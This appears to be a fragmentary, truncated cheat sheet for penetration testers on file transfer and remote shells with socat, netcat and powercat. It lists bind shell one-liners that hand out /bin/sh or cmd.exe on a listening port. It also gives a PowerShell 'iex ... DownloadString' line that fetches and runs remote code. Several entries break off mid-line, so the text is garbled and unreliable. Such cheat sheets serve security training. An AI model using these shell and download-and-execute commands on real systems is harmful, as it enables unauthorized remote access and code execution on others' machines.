socat - TCP4:<server ip>:<port>
Ports below 1024 require sudo/root permissions
socat TCP4-LISTEN:<port> STDOUT
netcat Note: There will be no progress indicator, and the command will not terminate when complete. Estimate how long the transfer will take, terminate the command, and verify the file. Recei...
Netcat Server - Linux nc -nvlp 4444 -e /bin/sh Server - Windows nc -nlvp 4444 -e cmd.exe Client nc -nv <server ip> 4444 Powercat Server - Windows Standard powercat -l -p 443 -e c...
Not installed on Kali by default sudo apt install powercat /usr/share/windows-resources/powercat Delivery iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubuserco...
Netcat
-